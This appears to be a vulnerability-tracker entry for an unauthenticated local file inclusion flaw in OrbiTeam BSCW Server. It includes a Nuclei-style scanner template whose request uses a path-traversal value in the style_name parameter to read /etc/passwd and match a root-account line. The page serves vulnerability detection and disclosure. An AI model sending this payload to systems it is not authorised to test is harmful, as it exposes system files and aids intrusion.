orbiteam-bscw-server-lfi: OrbiTeam BSCW Server - Local File Inclusion

2025-08-01 OrbiTeam BSCW Server PoC Public

Description

OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.

PoC

id: orbiteam-bscw-server-lfi

info:
  name: OrbiTeam BSCW Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: bscw,orbiteam,lfi,unauth,packetstorm,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf458f4423b5378cb9f3d9f5b3f0d41205d4cd352c9c18a83a3b4b3024ac069f02203052194675acc63418ea1a1bda0df990f84425955a056cfd74a05dc264104f0d:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities